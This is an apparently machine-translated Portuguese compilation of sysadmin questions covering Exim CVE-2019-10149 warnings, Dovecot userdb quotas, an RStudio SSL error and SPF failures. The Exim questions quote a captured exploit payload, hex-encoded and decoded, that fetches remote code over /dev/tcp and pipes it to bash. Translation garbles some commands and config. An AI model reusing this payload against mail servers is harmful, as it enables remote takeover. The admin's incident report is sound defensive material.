Skippy le Grand Gourou's questions

Depois de atualizar o Exim4 para uma versão oficial corrigida, corrigindo a vulnerabilidade CVE-2019-10149 (ou seja , exim4_4.89-2+deb9u4 ) no meu servidor estável Debian, ainda recebo os avisos "Mensagem congelada" sobre e-mails suspeitos.

É esperado ou esses e-mails suspeitos devem ser descartados silenciosamente? Parece que não consigo entender como o patch afeta esse comportamento - suponho que esses e-mails acionariam a !parse_extract_address(…)condição e, portanto, seriam registrados e rejeitados, mas não parece ser o caso?

De repente, estou recebendo vários e-mails curiosos de "Mensagem congelada" do meu servidor (Exim 4.89, Debian estável):

A mensagem 1hcbPR-0005t1-2r foi congelada (mensagem de erro de entrega).

O remetente é <>.

O(s) seguinte(s) endereço(s) ainda não foram entregues:

root+${executar{\x2fbin\x2fbash\x20\x2dc\x20\x22\x65\x78\x65\x63\x20\x35\x3c\x3e\x2f\x64\x65\x76\x2f\x74\x63\x70\ x2f\x35\x31\x2e\x33\x38\x2e\x31\x33\x33\x2e\x32\x33\x32\x2f\x38\x30\x3b\x65\x63\x68\x6f\x20\x2d\x65\ x20\x27\x47\x45\x54\x20\x2f\x20\x48\x54\x54\x50\x2f\x31\x2e\x30\x5c\x6e\x27\x20\x3e\x26\x35\x3b\x74\ x61\x69\x6c\x20\x2d\x6e\x20\x2b\x31\x31\x20\x3c\x26\x35\x20\x7c\x20\x62\x61\x73\x68\x22\x20\x26}}@ localhost: Muitos cabeçalhos "Recebidos" - suspeita de loop de correio

$ sudo exim4 -Mvb 1hcbPR-0005t1-2r
1hcbPR-0005t1-2r-D
$ sudo exim4 -Mvh 1hcbPR-0005t1-2r
1hcbPR-0005t1-2r-H
Debian-exim 101 103
<>
1560715549 0
-helo_name localhost
-host_address 163.172.157.143.51642
-interface_address <MY.IP>.25
-received_protocol smtp
-body_linecount 0
-max_received_linelength 12
-frozen 1560715549
-host_lookup_failed
XX
1
root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22\x65\x78\x65\x63\x20\x35\x3c\x3e\x2f\x64\x65\x76\x2f\x74\x63\x70\x2f\x35\x31\x2e\x33\x38\x2e\x31\x33\x33\x2e\x32\x33\x32\x2f\x38\x30\x3b\x65\x63\x68\x6f\x20\x2d\x65\x20\x27\x47\x45\x54\x20\x2f\x20\x48\x54\x54\x50\x2f\x31\x2e\x30\x5c\x6e\x27\x20\x3e\x26\x35\x3b\x74\x61\x69\x6c\x20\x2d\x6e\x20\x2b\x31\x31\x20\x3c\x26\x35\x20\x7c\x20\x62\x61\x73\x68\x22\x20\x26}}@localhost

569P Received: from [163.172.157.143] (helo=localhost)
    by myserver.example.org with smtp (Exim 4.89)
    id 1hcbPR-0005t1-2r
    for root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22\x65\x78\x65\x63\x20\x35\x3c\x3e\x2f\x64\x65\x76\x2f\x74\x63\x70\x2f\x35\x31\x2e\x33\x38\x2e\x31\x33\x33\x2e\x32\x33\x32\x2f\x38\x30\x3b\x65\x63\x68\x6f\x20\x2d\x65\x20\x27\x47\x45\x54\x20\x2f\x20\x48\x54\x54\x50\x2f\x31\x2e\x30\x5c\x6e\x27\x20\x3e\x26\x35\x3b\x74\x61\x69\x6c\x20\x2d\x6e\x20\x2b\x31\x31\x20\x3c\x26\x35\x20\x7c\x20\x62\x61\x73\x68\x22\x20\x26}}@localhost; Sun, 16 Jun 2019 22:05:49 +0200
012P Received: 1
012P Received: 2
012P Received: 3
012P Received: 4
012P Received: 5
012P Received: 6
012P Received: 7
012P Received: 8
012P Received: 9
013P Received: 10
013P Received: 11
013P Received: 12
013P Received: 13
013P Received: 14
013P Received: 15
013P Received: 16
013P Received: 17
013P Received: 18
013P Received: 19
013P Received: 20
013P Received: 21
013P Received: 22
013P Received: 23
013P Received: 24
013P Received: 25
013P Received: 26
013P Received: 27
013P Received: 28
013P Received: 29
013P Received: 30
013P Received: 31

Parece injeção de código, mas não entendo e não parece muito prejudicial para mim:

root+${run{/bin/bash -c "exec 5<>/dev/tcp/51.38.133.232/80;echo -e 'GET / HTTP/1.0\n' >&5;tail -n +11 <&5 | bash" &}}@localhost: Too many "Received" headers - suspected mail loop

Todas as mensagens são semelhantes, com um endereço IP e uma porta diferentes. Todos vêm do mesmo endereço.

É uma infecção conhecida?

Eu tenho um servidor de e-mail configurado para usar o dovecot com usuários virtuais:

passdb {
  driver = passwd-file
  args = username_format=%n /etc/vmail/%d/users
}

userdb {
  driver = static
  args = uid=109 gid=111 home=/home/vmail/%d/%n
}

Agora preciso definir cotas de armazenamento para alguns usuários. Aparentemente, isso não é possível com o staticdriver, então imaginei que a maneira mais simples de habilitá-lo seria mudar para passwd-file. No entanto, eu luto para realmente fazê-lo funcionar.

Usando o mesmo passdbacima e

userdb {
  driver = passwd-file
  args = username_format=%n /etc/vmail/%d/users
  default_fields = uid=vmail gid=vmail home=/home/vmail/%d/%n
}

93.184.216.34 recebo os seguintes erros:

dovecot: imap: Erro: usuário autenticado não encontrado no userdb, ID de pesquisa de autenticação = 345505793 (client-pid = 30121 client-id = 1)

dovecot: auth: Erro: passwd-file([email protected],93.184.216.34,): user not found from userdb

Eu tentei muitas variações e li muitas páginas do wiki do dovecot, incluindo AuthDatabase/PasswdFile , mas não consigo interpretar a documentação corretamente.

Como transponho minha staticconfiguração em um passwd-filearquivo com modificações mínimas?

/etc/vmail/%d/usersos arquivos são do formato padrão

user:{SHA512}…

E aqui está a saída dovecot userdbpara essas configurações:

userdb {
  args = username_format=%n /etc/vmail/%d/users
  auth_verbose = default
  default_fields = uid=vmail gid=vmail home=/home/vmail/%d/%n
  driver = passwd-file
  name = 
  override_fields = 
  result_failure = continue
  result_internalfail = continue
  result_success = return-ok
  skip = never
}

Instalei o rstudio-server em uma instância AWS EC2. Correu tudo bem, mas ao tentar acessar https://myawsserver.example.org:8787recebo o seguinte erro:

Falha na Conexão Segura

Ocorreu um erro durante uma conexão com XX.XX.XX.XX:8787. SSL recebeu um registro que excedeu o comprimento máximo permitido. Código de erro: SSL_ERROR_RX_RECORD_TOO_LONG

Não consigo encontrar nenhum problema nos logs ou em qualquer lugar. O que há de errado ?

Estou tentando configurar SPF/DKIM/DMARC no meu servidor de e-mail em um VPS. Aqui está minha configuração de DNS (DKIM e DMARC removidos para facilitar a leitura):

@                       28800  A      X.X.X.X
@                       28800  MX     10 smtp.example.com.
smtp                    28800  A      X.X.X.X
www                     28800  A      X.X.X.X
@                       28800  TXT    "v=spf1 ip4:X.X.X.X -all"
smtp.example.com.       28800  TXT    "v=spf1 ip4:X.X.X.X  -all"
www.example.com.        28800  TXT    "v=spf1 -all"

Os e-mails parecem funcionar e o port25.com não relata nada de errado:

==========================================================
Summary of Results
==========================================================
SPF check:          pass
DomainKeys check:   neutral
DKIM check:         pass
SpamAssassin check: ham

No entanto, o Yahoo relata uma falha no SPF:

<?xml version="1.0"?>   
<feedback>      
  <report_metadata>     
    <org_name>Yahoo! Inc.</org_name>    
    <email>[email protected]</email>   
    <report_id>1484621522.715243</report_id>    
    <date_range>        
      <begin>1484524800</begin> 
      <end>1484611199 </end>    
    </date_range>       
  </report_metadata>    
  <policy_published>    
    <domain>example.com</domain>  
    <adkim>s</adkim>    
    <aspf>s</aspf>      
    <p>reject</p>       
    <pct>100</pct>      
  </policy_published>   
  <record>      
    <row>       
      <source_ip>X.X.X.X</source_ip>      
      <count>7</count>  
      <policy_evaluated>        
        <disposition>none</disposition> 
        <dkim>pass</dkim>       
        <spf>fail</spf> 
      </policy_evaluated>       
    </row>      
    <identifiers>       
      <header_from>example.com</header_from>      
    </identifiers>      
    <auth_results>      
      <dkim>    
        <domain>example.com</domain>      
        <result>pass</result>   
      </dkim>   
      <spf>     
        <domain>myVPS.provider.com</domain>      
        <result>none</result>   
      </spf>    
    </auth_results>     
  </record>     
</feedback>

Parece que o Yahoo está verificando o nome HELO (aqui myVPS.provider.com), que embora tenha o mesmo endereço IP do domínio de envio, não possui registro SPF (e não consigo editar sua configuração de DNS sozinho).

Isso resolveria o problema se meu provedor VPS adicionasse o seguinte à configuração DNS de myVPS.provider.com ?

myVPS.provider.com.  IN TXT  "v=spf1 ip4:X.X.X.X  -all"

Existem outras alternativas?